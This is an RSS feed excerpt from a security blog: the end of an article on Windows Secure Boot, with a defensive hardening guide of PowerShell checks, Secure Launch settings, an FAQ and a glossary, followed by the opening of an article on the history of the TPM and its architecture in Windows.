&lt;p&gt;At the other endpoint sits Trusted Firmware-A on Armv7-A and Armv8-A platforms. TF-A is the reference secure-world software stack with a Secure Monitor at Exception Level 3 [@tfa-home]. The Trusted Board Boot feature implements Arm&apos;s TBBR-CLIENT specification (DEN0006D): &quot;The Trusted Board Boot (TBB) feature prevents malicious firmware from running on the platform by authenticating all firmware images up to and including the normal world bootloader&quot; [@tfa-tbb]. The chain runs BL1 -&amp;gt; BL2 -&amp;gt; BL31 / BL32 -&amp;gt; BL33, anchored on a ROTPK (Root of Trust Public Key) fused per silicon family. Because TBBR is a specification rather than a single shipping product, the actual signing keys and update cadence are the OEM&apos;s choice. The silicon vendor sets the fuse policy; the platform vendor signs the boot images; the operating-system vendor sees a verified BL33 handoff and trusts whatever ROTPK the silicon was fused with. There is no monoculture, and there is no single update cadence -- which is exactly what makes the security guarantees uneven across Arm devices in practice.&lt;/p&gt;
&lt;p&gt;Pluton sits between Apple and TF-A. Microsoft authors the firmware (vendor-monopoly trust anchor) on silicon Microsoft does not own (AMD, Intel, Qualcomm fabricate it) [@ms-pluton]. The contrast is sharpest at the firmware-update cadence. Apple-cadence ships everything as one. OEM-UEFI-capsule-cadence is what discrete TPMs and PCH-isolated fTPM/PTT firmware are stuck with -- which is why a known-bad fTPM firmware can take months to land on every customer device after Microsoft posts a fix. Windows-Update-cadence is what Pluton offers: a Microsoft-authored firmware update riding the same channel that ships kernel patches. The same axis -- &lt;em&gt;who&lt;/em&gt; owns the trust anchor and &lt;em&gt;on whose schedule&lt;/em&gt; it ships -- is the axis on which the article&apos;s main Pluton argument turns.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;There are honest residual limits. Pluton is a TPM, not a verification chain; the rest of Secure Boot still runs in DXE-phase firmware that LogoFAIL can compromise. Adoption is non-universal -- as of 2026, Pluton ships on Microsoft Surface, AMD Ryzen 6000-9000/AI series, a subset of Intel Core Ultra (200V / Series 3) parts, and Qualcomm Snapdragon 8cx Gen 3 / X parts powering Copilot+ PCs, with many enterprise PCs still on discrete TPMs [@ms-pluton]. The OEM still owns PK and the firmware update path &lt;em&gt;outside&lt;/em&gt; Pluton, so the dbx-revocation problem and the OEM-key-leak problem are unaddressed by Pluton alone. Attestation infrastructure -- Device Health Attestation, Intune device-health Conditional Access -- is still maturing, and the policies that consume attestation outcomes are still hand-rolled per organisation.&lt;/p&gt;
&lt;p&gt;Pluton closes the cadence gap. It does not close the gap between &lt;em&gt;patched&lt;/em&gt; and &lt;em&gt;revoked&lt;/em&gt; -- nothing yet does, and that is the next decade&apos;s problem.&lt;/p&gt;
&lt;h2&gt;11. Practical guide, FAQ, and where the chain goes next&lt;/h2&gt;
&lt;p&gt;This is the part you do today, on whatever Windows machine is in front of you, before this article ages another year.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Verify Secure Boot state.&lt;/strong&gt; Open an elevated PowerShell prompt and run &lt;code&gt;Confirm-SecureBootUEFI&lt;/code&gt;. The cmdlet returns &lt;code&gt;True&lt;/code&gt; only if Secure Boot is currently enforcing. &lt;code&gt;msinfo32&lt;/code&gt; shows BIOS Mode (UEFI vs Legacy) and Secure Boot State on its System Summary page. &lt;code&gt;Get-SecureBootPolicy&lt;/code&gt; reveals which Secure Boot policy GUID is in force; the default Microsoft policy on a healthy modern install is &lt;code&gt;{77fa9abd-0359-4d32-bd60-28f4e78f784b}&lt;/code&gt; (the Microsoft owner GUID for the canonical KEK/db/dbx variables) [@ms-secureboot-objects]. &lt;code&gt;Get-Tpm&lt;/code&gt; and &lt;code&gt;tpmtool getdeviceinformation&lt;/code&gt; confirm that the TPM is present, owned, and ready [@ms-trusted-boot, @ms-secure-boot-process].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Read the TPM event log.&lt;/strong&gt; &lt;code&gt;tpmtool gatherlogs&lt;/code&gt; collects the WBCL files into a working folder you can inspect; &lt;code&gt;Get-WinEvent -LogName Microsoft-Windows-TPM-WMI&lt;/code&gt; exposes the boot and provisioning events. On a healthy boot, the WBCL and the live PCR state replay to the same digest; mismatch is the attestation signal a remote verifier looks for.&lt;/p&gt;

The following one-liner gathers the basic state in elevated PowerShell:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;&quot;&quot; |
  Select-Object @{n=&apos;SecureBoot&apos;; e={ Confirm-SecureBootUEFI }},
                @{n=&apos;SBPolicy&apos;;  e={ (Get-SecureBootPolicy).Publisher }},
                @{n=&apos;TPMReady&apos;;  e={ (Get-Tpm).TpmReady }},
                @{n=&apos;UEFI/BIOS&apos;; e={ (Get-CimInstance Win32_BIOS).SMBIOSBIOSVersion }} |
  Format-List
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If &lt;code&gt;SecureBoot&lt;/code&gt; is &lt;code&gt;False&lt;/code&gt;, your boot chain has no firmware-side allowlist. If &lt;code&gt;TPMReady&lt;/code&gt; is &lt;code&gt;False&lt;/code&gt;, BitLocker is sealing to nothing -- recovery-key escrow is your only protector.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Verify your Windows UEFI CA 2023 enrolment.&lt;/strong&gt; KB5025885 is a phased deployment; each mitigation step is enabled by writing the corresponding value to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Secureboot\AvailableUpdates&lt;/code&gt; (the values are listed in the support article) [@kb5025885]. The current UEFI db can be inspected with &lt;code&gt;Get-SecureBootUEFI db&lt;/code&gt; and &lt;code&gt;Format-SecureBootUEFI&lt;/code&gt;. The 2023 CA&apos;s certificate has subject CN &lt;code&gt;Windows UEFI CA 2023&lt;/code&gt;. If you do not see it in db and you are running a Windows install that has been online during 2025-2026, the deployment programme has not reached your device; consult the KB article for the next steps.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 2011 CA expires in late June 2026. After that, signed-but-old bootloaders that depend on the 2011 CA will not validate without explicit dbx housekeeping. If your install media is older than May 2023 and you have not run a full set of cumulative updates, you may end up with a machine that boots today but cannot boot a future Windows recovery image. The fix is to apply the KB5025885 updates and verify the 2023 CA is enrolled before that deadline [@kb5025885].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Enable DRTM / System Guard Secure Launch where the silicon supports it.&lt;/strong&gt; The control surfaces are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;MDM CSP: &lt;code&gt;DeviceGuard/ConfigureSystemGuardLaunch&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Group Policy: &lt;em&gt;Computer Configuration &amp;gt; Administrative Templates &amp;gt; System &amp;gt; Device Guard &amp;gt; Turn On Virtualization Based Security &amp;gt; Secure Launch Configuration&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;Registry: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\SystemGuard\Enabled = 1&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Verify via &lt;code&gt;msinfo32&lt;/code&gt;: under &lt;em&gt;System Summary&lt;/em&gt; the &lt;em&gt;Virtualization-based Security Services Configured / Running&lt;/em&gt; line should include &lt;em&gt;Secure Launch&lt;/em&gt; [@ms-system-guard].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Replace TPM-only BitLocker.&lt;/strong&gt; After Bitpixie, TPM-only BitLocker is no longer a defensible default. Add a pre-boot PIN (&lt;code&gt;manage-bde -protectors -add C: -tpmAndPin&lt;/code&gt;) or a USB startup key where the edition and management model support it [@neodyme-bitpixie, @syss-bitpixie].&lt;/p&gt;
&lt;p&gt;{`
// JavaScript analogue of the PowerShell one-liner above. The real cmdlets
// query NV variables and the TPM driver directly; this just shows the shape
// of what a remote attestation collector would assemble.&lt;/p&gt;
&lt;p&gt;function healthCheck(state) {
  return {
    secureBoot:  state.secureBoot === true,
    sbPolicyGuid: state.policyGuid ?? &apos;unknown&apos;,
    tpmReady:    state.tpmReady === true,
    pcr7:        state.pcr7,
    caEnrolled:  state.dbCerts.includes(&apos;Windows UEFI CA 2023&apos;),
    notes:       []
  };
}&lt;/p&gt;
&lt;p&gt;const live = healthCheck({
  secureBoot:  true,
  policyGuid:  &apos;{77fa9abd-0359-4d32-bd60-28f4e78f784b}&apos;,
  tpmReady:    true,
  pcr7:        &apos;0xab4c...&apos;,
  dbCerts:     [&apos;Microsoft Windows Production PCA 2011&apos;, &apos;Microsoft Corporation UEFI CA 2011&apos;, &apos;Windows UEFI CA 2023&apos;]
});&lt;/p&gt;
&lt;p&gt;console.log(live);
`}&lt;/p&gt;

No. Secure Boot defends the boot chain. Ransomware targets user data after the operating system is up and the user is logged in, so it sees a signed Windows kernel exactly as it should. The defences against ransomware are runtime: Defender, EDR, Controlled Folder Access, and offline backups. Secure Boot is a precondition for trusting the operating system that hosts those runtime defences, but it is not a runtime defence itself.

Yes, via the Microsoft-signed `shim`. The maintenance burden: keep `shim` current under the Windows UEFI CA 2023 rollout (`shim-signed`, `shim-x64`, `mokutil` packages on most distributions) or your Linux install will lose its boot path when older `shim` builds are revoked. See `The shim escape hatch` Aside in §4 for the underlying mechanism [@sbat-shim].

Yes. Pluton replaces the TPM, not the signature-verification chain. Pluton is a cryptoprocessor: it implements TPM 2.0 on the CPU die, holds keys, performs `extend` operations, and signs attestations [@ms-pluton-as-tpm]. Secure Boot is the firmware-side `LoadImage()` allowlist check. The two rails are complementary, not substitutes -- Pluton makes Measured Boot&apos;s endpoint better; it does not replace Secure Boot&apos;s verifier.

The 2011 CA is being revoked. You need a `shim` signed by the 2023 CA. Update from your distribution&apos;s secure-boot package (the canonical names are `shim-signed`, `shim-x64`, or `mokutil`). If your installation media is older than May 2023 and you have not run distribution updates, expect breakage somewhere between your next dbx update and the June 2026 expiry [@kb5025885, @sbat-shim].

Not as a default. After Bitpixie / CVE-2023-21563, TPM-only BitLocker can be defeated with a LAN cable and a keyboard on a Windows 11 install with Microsoft Account defaults. See `Replace TPM-only BitLocker` in Section 11 for the fix list [@neodyme-bitpixie].

Trusted Boot is *signature-policy enforcement*: `bootmgfw.efi` and `winload.efi` refuse to load any kernel-mode binary whose Authenticode hash or signer is not in the trusted-boot policy, and the kernel-mode `ci.dll` continues that enforcement after handoff. Measured Boot is *hash-into-PCR recording*: every binary that loads is also extended into a TPM PCR so a verifier (BitLocker locally, an attestation service remotely) can later prove what code ran. Trusted Boot stops bad code; Measured Boot records what code ran. They run in parallel, not in sequence [@ms-trusted-boot, @ms-secure-boot-process].
&lt;p&gt;The chain is longer than it has ever been. It is not yet long enough.&lt;/p&gt;
&lt;p&gt;The next article in this series picks up where &lt;code&gt;userinit&lt;/code&gt; ends. Once Windows is running, the question shifts from &lt;em&gt;which code loaded?&lt;/em&gt; to &lt;em&gt;what does this device look like to a remote verifier right now?&lt;/em&gt; Device Health Attestation, runtime measurement of the running kernel and Secure Kernel, and Conditional Access decisions tied to attestation outcomes are the runtime continuation of everything we walked through here. Pluton on the boot chain feeds Pluton-rooted attestation at runtime. Secure Boot ends at the desktop. The runtime chain begins there.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;secure-boot-in-windows&quot; keyTerms={[
  { term: &quot;Bootkit&quot;, definition: &quot;Malware that survives operating-system reinstallation by infecting code that runs before the operating system loads -- MBR, ESP, firmware, or below.&quot; },
  { term: &quot;UEFI Platform Initialization (PI)&quot;, definition: &quot;Four-phase firmware pipeline (SEC, PEI, DXE, BDS); Secure Boot&apos;s verifier lives in DXE.&quot; },
  { term: &quot;PK / KEK / db / dbx&quot;, definition: &quot;Authenticated UEFI variables: Platform Key, Key Exchange Key, allowlist, denylist.&quot; },
  { term: &quot;Trusted Boot&quot;, definition: &quot;Microsoft&apos;s policy enforcement chain from bootmgfw.efi through winload.efi, ntoskrnl.exe, ELAM, and every boot-start driver.&quot; },
  { term: &quot;SRTM&quot;, definition: &quot;Static Root of Trust for Measurement: the boot-time chain of TPM extends anchored in the immutable CRTM.&quot; },
  { term: &quot;DRTM&quot;, definition: &quot;Dynamic Root of Trust for Measurement: late-launched via GETSEC[SENTER] or SKINIT to re-anchor measurement after firmware boot.&quot; },
  { term: &quot;ELAM&quot;, definition: &quot;Early Launch Anti-Malware: a specially-signed driver class that loads as the first boot-start driver, ahead of every other boot-start driver, and classifies them Good/Bad/Unknown/BadButCritical.&quot; },
  { term: &quot;PCR[7]&quot;, definition: &quot;Platform Configuration Register holding the state of Secure Boot; the canonical BitLocker seal target on modern Windows.&quot; },
  { term: &quot;Baton Drop&quot;, definition: &quot;CVE-2022-21894: a memory-map manipulation primitive in older signed bootmgfw.efi revisions that BlackLotus used to bypass Secure Boot.&quot; },
  { term: &quot;Bitpixie&quot;, definition: &quot;CVE-2023-21563: older signed bootmgfw.efi revisions do not erase the BitLocker VMK from physical memory before the PXE soft-reboot handoff, leaving the VMK in RAM where a downgraded payload chain-loaded over PXE can dump it.&quot; },
  { term: &quot;SBAT&quot;, definition: &quot;Secure Boot Advanced Targeting: rhboot/shim&apos;s generation-number revocation scheme, the partial answer to dbx capacity exhaustion.&quot; },
  { term: &quot;Pluton&quot;, definition: &quot;Microsoft&apos;s cryptoprocessor on the CPU die, implementing TPM 2.0, with firmware delivered by Microsoft via Windows Update.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>secure-boot</category><category>windows-security</category><category>uefi</category><category>measured-boot</category><category>tpm</category><category>pluton</category><category>bootkit</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The TPM in Windows: One Primitive, Twenty-Five Years, and the Chip Microsoft Bet On Twice</title><link>https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/</link><guid isPermaLink="true">https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/</guid><description>How a passive 1999 cryptoprocessor became the load-bearing pillar of Windows security, and what twenty-five years of attacks taught us about its limits.</description><pubDate>Fri, 08 May 2026 00:00:00 GMT</pubDate><content:encoded>
The TPM (1.2 since 2007, 2.0 since 2014) is the hardware root of trust under almost every Windows security feature shipped since Vista -- BitLocker, Measured Boot, Credential Guard, Windows Hello, device attestation. Twenty-five years of engineering refined a single primitive (measure, extend, seal, quote) into something one chip could underwrite. Twenty-five years of attacks (Andzakovic 2019, TPM-Fail 2020, faulTPM 2023) have argued empirically about how passive that chip can be. The current state of the art -- Microsoft Pluton on the CPU die, Microsoft-signed Rust firmware (on 2024 AMD and Intel platforms) delivered via Windows Update -- closes the bus and the TEE attack surfaces, but centralizes firmware trust on Microsoft. Post-quantum migration is the next frontier.
&lt;h2&gt;1. The chip nobody asked for&lt;/h2&gt;
&lt;p&gt;On June 24, 2021, Microsoft announced Windows 11 [@ms-windows-experience-blog-2021] -- and told hundreds of millions of working PCs they were no longer eligible to upgrade. Not because they were too slow. Because they did not have a small chip most users had never thought about: a TPM 2.0. The PR backlash was immediate; the technical rationale was almost invisible. &lt;em&gt;Why was Microsoft willing to take that much heat over a piece of silicon?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The next morning, Microsoft&apos;s security team tried to explain [@ms-security-blog-windows11-2021]. The argument was four words long: hardware root of trust.&lt;/p&gt;

All certified Windows 11 systems will come with a TPM 2.0 chip to help ensure customers benefit from security backed by a hardware root-of-trust.
&lt;p&gt;That sentence sat awkwardly against the user experience: a green checkmark in the PC Health Check tool, or a red X telling you to buy a new computer. The deeper claim -- that a passive cryptoprocessor underwrote the security guarantees of half the operating system -- was not something Microsoft had ever asked consumers to think about. For OEMs, the requirement was old news. Since July 28, 2016 [@ms-learn-oem-tpm], every new Windows device model had been contractually required to &quot;implement and enable by default TPM 2.0.&quot; The 2021 mandate did not introduce the chip. It made an existing OEM rule into a visible install gate.&lt;/p&gt;

A small, isolated cryptoprocessor that holds keys, performs cryptographic operations, and records integrity measurements -- usually on a separate package or block of silicon that the host operating system cannot read directly. The TPM is &quot;passive&quot;: it executes commands sent to it but never reaches into the host&apos;s memory.

The PC Health Check tool was pulled and re-released. Reddit and Hacker News spent a weekend arguing about whether Microsoft had effectively bricked older hardware to sell new licenses. Microsoft&apos;s reply -- that TPM-by-default produces measurable population-level security gains even when individual users do not understand it -- was correct, but never quite the rebuttal that a consumer audience could engage with. The politics of &quot;Trusted Computing&quot; had returned, twenty years after the original Stallman objection [@wikipedia-trusted-computing].
&lt;p&gt;This article is about that piece of silicon: what it does, why Windows needs it more than ever, and why twenty-five years of engineering and twenty-five years of attacks have together produced a chip that quietly defines what modern Windows can defend against -- and what it cannot.&lt;/p&gt;
&lt;p&gt;The central claim, which the rest of this piece will earn: a passive cryptoprocessor designed in 1999 became the load-bearing pillar of half of Windows security, and the history of attacks against it has been a sustained empirical argument about exactly how passive that pillar is allowed to be.&lt;/p&gt;
&lt;h2&gt;2. The problem the TPM was built to solve&lt;/h2&gt;
&lt;p&gt;Picture an engineer at IBM in early 2000. The Windows kernel has just been rooted again. The newly shipped DPAPI master keys -- introduced with Windows 2000&apos;s general availability on February 17, 2000 [@wikipedia-windows-2000] -- are recoverable in seconds once SYSTEM falls. Stolen ThinkPads come back with their fresh EFS volumes already decrypted. Where do you put a secret that the OS cannot read?&lt;/p&gt;
&lt;p&gt;Software-only key storage was Generation 0. Windows had DPAPI, EFS, and LSA secrets [@ms-learn-cryptography-portal], all deriving their wrapping keys from the user&apos;s logon credential or from system-level material. Every derivation had the same structural problem: the unwrapping key, sooner or later, lived in the kernel&apos;s address space. An attacker who reached SYSTEM (or who carried the disk away to a separate machine) could replay it. A volume encrypted &quot;at rest&quot; was decryptable as soon as the disk was readable -- and a disk you can read is a disk you can read offline. Microsoft now states the constraint plainly: a TPM-resident key, by contrast, &quot;truly can&apos;t leave the TPM&quot; [@ms-learn-how-windows-uses-tpm]. That property cannot be retrofitted onto software-only storage.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Software-only key storage cannot defend against an attacker who reaches SYSTEM, and cannot defend against an attacker who carries the disk away. To survive both, the secret must live in silicon that the OS itself cannot read.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In October 1999 [@wikipedia-tcg], five PC-industry incumbents took that observation and turned it into an industrial coalition: Compaq, Hewlett-Packard, IBM, Intel, and Microsoft incorporated the Trusted Computing Platform Alliance.The Wikipedia Trusted Computing Group article gives the day-precision date as October 11, 1999. The original TCPA press release URL has not survived; the founder list and date are consistent across secondary sources. TCPA&apos;s charter was narrow: define a chip that could hold keys an x86 OS could not export, record boot-time integrity measurements, and sign attestations about that boot. The first chip to ship against the resulting TPM Main Specification 1.1b [@tcg-tpm-main-spec] appeared in 2003 [@wikipedia-tpm]. Atmel, Infineon, and STMicroelectronics built it [@wikipedia-tpm].&lt;/p&gt;
&lt;p&gt;In parallel, Microsoft Research ran its own bet. Paul England, Butler Lampson, John Manferdelli, Marcus Peinado, and Bryan Willman [@england-2003-trusted-open-platform] published &quot;A Trusted Open Platform&quot; in &lt;em&gt;IEEE Computer&lt;/em&gt;, July 2003. The codename inside Microsoft was Palladium; the public name was the Next-Generation Secure Computing Base, NGSCB. It described a Windows where high-assurance code could run isolated from a possibly-compromised OS kernel, anchored in a hardware secure coprocessor that looked very much like a TPM. The motivating sentence read like a thesis: NGSCB extends personal computers &quot;to offer mechanisms that let high-assurance software protect itself from the operating systems, device drivers, BIOS, and other software running on the same machine.&quot;&lt;/p&gt;
&lt;p&gt;NGSCB never shipped as advertised. By 2005, reports indicated [@wikipedia-ngscb] that Microsoft would ship &quot;only part of the architecture, BitLocker, which can optionally use the Trusted Platform Module to validate the integrity of boot and system files prior to operating system startup.&quot; The &quot;Nexus&quot; hypervisor, the user-mode high-assurance &quot;agents,&quot; the protected paths for keyboard and display -- all dropped against the Vista deadline.The deadline pressure on Vista is legendary. The architecture team chose to ship the smallest piece of NGSCB the existing chip could underwrite -- BitLocker -- and shelved the rest. That shelved piece eventually returned, fifteen years later, as Virtualization-Based Security and Credential Guard.&lt;/p&gt;
&lt;p&gt;The shelved primitives, however, did not die. &lt;em&gt;Measured boot&lt;/em&gt; -- the firmware measures the boot loader, the boot loader measures the kernel, each measurement extended into a register that cannot be rewound -- migrated into Vista &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; and, later, into Windows 8 Measured Boot. &lt;em&gt;Sealed storage&lt;/em&gt; -- a key tied to a measured boot state, unreleasable unless the boot state matches -- became the defining property of every TPM-bound BitLocker volume. &lt;em&gt;Remote attestation&lt;/em&gt; -- a device signing a quote of its own measurements for a remote verifier -- became Device Health Attestation. NGSCB shipped, just not as itself.&lt;/p&gt;

In the early 2000s, Richard Stallman and the Free Software Foundation framed Trusted Computing as &quot;treacherous computing&quot; [@wikipedia-trusted-computing]: hardware secured &quot;for its owner, but also against its owner.&quot; That objection has aged unevenly. The DRM concerns the FSF predicted did not dominate -- Hollywood never got the protected video paths it wanted on PCs. The trust-centralization concern has aged well: the modern Pluton debate raises a structurally similar question about who holds the signing key on the world&apos;s PC fleet, and the answer is now political rather than technical.
&lt;p&gt;TCPA had built a chip that could hold a key the OS couldn&apos;t read. Which keys, under whose authority, against which threats? The first answer was almost good enough -- and it lasted about a decade.&lt;/p&gt;
&lt;h2&gt;3. Generation 1 and Generation 2: TPM 1.1b -&amp;gt; 1.2, and why they failed&lt;/h2&gt;
&lt;p&gt;If you opened a 2007 ThinkPad and looked at the LPC bus next to the Super-IO chip, you would see a small Infineon SLB chip [@andzakovic-2019-tpm-sniffing]. That was your TPM 1.2. It did exactly one job, and Vista&apos;s BitLocker was the first feature to depend on it.&lt;/p&gt;
&lt;p&gt;The architectural skeleton of TPM 1.x [@wikipedia-tpm] was simple. At least sixteen Platform Configuration Registers, with the PC Client TPM Interface Specification mandating 24 per active bank. Hash algorithm: SHA-1. Asymmetric algorithm: RSA-2048. A single root of storage, the Storage Root Key, whose private half never left the chip. An Endorsement Key burned in at manufacture as the chip&apos;s permanent identity. An HMAC-SHA1 authorization model over command parameters. A &quot;Take Ownership&quot; ceremony where the platform owner created the SRK and bound it to an owner secret.&lt;/p&gt;

A TPM-internal register modified only by a one-way &quot;extend&quot; operation: $\text{PCR}_{\text{new}} = H(\text{PCR}_{\text{old}} \,\|\, \text{measurement})$. Static PCRs (0-15) cannot be rolled back without a full platform reset. TPM 2.0 also defines *dynamic* PCRs (16, 17-22, and 23 in the PC Client profile) that can be reset at specific localities via `TPM2_PCR_Reset`. DRTM uses PCRs 17-22 at locality 4 to re-launch a known measurement chain mid-run; PCRs 16 and 23 are resettable at lower localities for debug and application use. Either way, PCRs are the data structure that compresses a chain of measurements into a single attestable digest.

The TPM&apos;s permanent identity key, generated at manufacture and accompanied by an EK certificate from the chip vendor&apos;s CA. The EK is non-migratable and is used during attestation to prove that a given key was generated inside a genuine TPM. It is also the privacy-sensitive part of TPM identity: the EK is unique to one chip, so unrestricted use of the EK in attestation reveals which physical machine you are.

The root of the TPM&apos;s key hierarchy. In TPM 1.x there was exactly one SRK per chip, created during the &quot;Take Ownership&quot; ceremony. Every protected key in the hierarchy was a child of the SRK -- if you cleared the SRK, every key tied to it was lost.

A restricted signing key the TPM uses to sign quotes of PCR values for a remote verifier. Naming changed with the spec: in TPM 1.x it was the Attestation Identity Key (AIK), a separate RSA key whose binding to a real TPM was asserted by a Privacy CA&apos;s certificate over the EK. In TPM 2.0 it is the Attestation Key (AK), a primary key in the Endorsement Hierarchy *derived from the same Endorsement Primary Seed as the EK* -- the AK is a sibling of the EK, not a copy, and it is certified by the EK rather than being an alias of it. Either way, the AIK/AK signs the quote; the EK never directly signs anything.
&lt;p&gt;TPM 1.2 [@wikipedia-tpm], shipped in late 2003 and standardized as ISO/IEC 11889:2009, layered on the practical machinery: locality (a way for code at different privilege levels to extend different PCRs), monotonic counters, NV indices, transport sessions, and the eight-PCR split between firmware (PCR[0..7]) and OS (PCR[8..15]). It was the chip that mass-deployed in essentially every business PC from 2006 to 2014. When Windows Vista [@wikipedia-ngscb] reached volume-license RTM in late 2006 and broad availability in early 2007, BitLocker [@ms-learn-bitlocker] (Enterprise and Ultimate editions only) became the first mainstream Windows feature whose security depended on the chip: BitLocker sealed the Volume Master Key to PCR values describing the boot-loader chain, so that a stolen disk could not be decrypted offline. Secure Boot binding (PCR[7]) would not arrive until UEFI Secure Boot [@ms-learn-oem-secure-boot] shipped with Windows 8 in 2012.&lt;/p&gt;

flowchart TD
    EK[&quot;Endorsement Key (EK)&lt;br /&gt;RSA-2048, burned at manufacture&quot;]
    Owner[&quot;Owner secret&lt;br /&gt;(Take Ownership)&quot;]
    SRK[&quot;Storage Root Key (SRK)&lt;br /&gt;RSA-2048, single per chip&quot;]
    K1[&quot;Storage key&lt;br /&gt;(child)&quot;]
    K2[&quot;Binding key&lt;br /&gt;(child)&quot;]
    K3[&quot;Signing key&lt;br /&gt;(child)&quot;]
    AIK[&quot;Attestation Identity Key&lt;br /&gt;(independent RSA key)&quot;]
    PCA[&quot;Privacy CA&quot;]&lt;pre&gt;&lt;code&gt;Owner --&amp;gt; SRK
SRK --&amp;gt; K1
SRK --&amp;gt; K2
SRK --&amp;gt; K3
AIK --&amp;gt; PCA
EK -. cert .-&amp;gt; PCA
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem with all of this was not that anyone broke it. The problem was that the architecture hard-coded its cryptographic primitives into its data structures. SHA-1 was not a configurable algorithm; it was the literal width of the PCR register and of every hash field in the spec. RSA-2048 was not a configurable algorithm; it was the literal layout of the EK, the SRK, and every protected key blob. If the world deprecated SHA-1, you did not patch the firmware. You replaced the chip.&lt;/p&gt;
&lt;p&gt;NIST SP 800-131A deprecated SHA-1 [@nist-sp-800-131a-r2] digital signatures starting in 2011. The 2017 SHAttered collision [@google-2017-shattered] drove the point home.The 2017 SHAttered SHA-1 collision does not retroactively break Vista BitLocker in practice -- to do that, an attacker would have to choose firmware blobs whose hashes collide, not merely demonstrate a collision exists. But it ended any defense of &quot;SHA-1 in PCRs is fine because nobody can collide it.&quot; Algorithm flexibility cannot be retrofitted onto silicon whose data structures hard-code SHA-1. There were other limitations: a single SRK hierarchy meant clearing the chip&apos;s storage hierarchy also reset chip identity; the Privacy CA model for attestation never deployed at scale; ECC was missing; and the HMAC-based authorization model made every command exchange a piece of bespoke crypto plumbing.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;Asym&lt;/th&gt;
&lt;th&gt;Hierarchies&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Software-only (LSA / PStore)&lt;/td&gt;
&lt;td&gt;1996+ [@wikipedia-windows-nt-4]&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;NT 4.0 baseline; disk-readable wrapping keys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Software-only (DPAPI / EFS)&lt;/td&gt;
&lt;td&gt;2000+&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;RSA-1024 (EFS)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Defeated by offline disk theft and by SYSTEM compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TPM 1.1b&lt;/td&gt;
&lt;td&gt;2003&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;RSA-2048&lt;/td&gt;
&lt;td&gt;1 (SRK)&lt;/td&gt;
&lt;td&gt;First mass deployment; superseded by 1.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TPM 1.2&lt;/td&gt;
&lt;td&gt;2003-2014&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;RSA-2048&lt;/td&gt;
&lt;td&gt;1 (SRK)&lt;/td&gt;
&lt;td&gt;Vista/7/8 BitLocker baseline; algorithm-rigid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TPM 2.0&lt;/td&gt;
&lt;td&gt;2014+&lt;/td&gt;
&lt;td&gt;SHA-1 + SHA-256 (+ SHA-3, future PQC)&lt;/td&gt;
&lt;td&gt;RSA, ECC&lt;/td&gt;
&lt;td&gt;4 (Platform / Endorsement / Storage / Null)&lt;/td&gt;
&lt;td&gt;Current; ISO/IEC 11889:2015&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;TCG accepted the constraint in 2014 and started over. The 2.0 design did not add features to 1.2. It answered a different question: how do you let one TPM survive twenty years of cryptographic transitions?&lt;/p&gt;
&lt;h2&gt;4. Generation 3: TPM 2.0 -- one primitive, many algorithms&lt;/h2&gt;
&lt;p&gt;On April 9, 2014 [@wikipedia-tpm], the Trusted Computing Group [@tcg-tpm2-library-spec] did something rare in standards bodies: they threw away a working specification and started from a different question. The result was the TPM 2.0 Library Specification, Family 2.0, Level 00, Revision 116. A year later it became ISO/IEC 11889-1:2015 Edition 2 [@iso-iec-11889-1-2015], which removed the &quot;industry consortium&quot; objection from procurement teams in regulated environments. By July 28, 2016 [@ms-learn-oem-tpm], Microsoft had quietly made TPM 2.0 a contractual must-have for every new Windows OEM SKU.&lt;/p&gt;
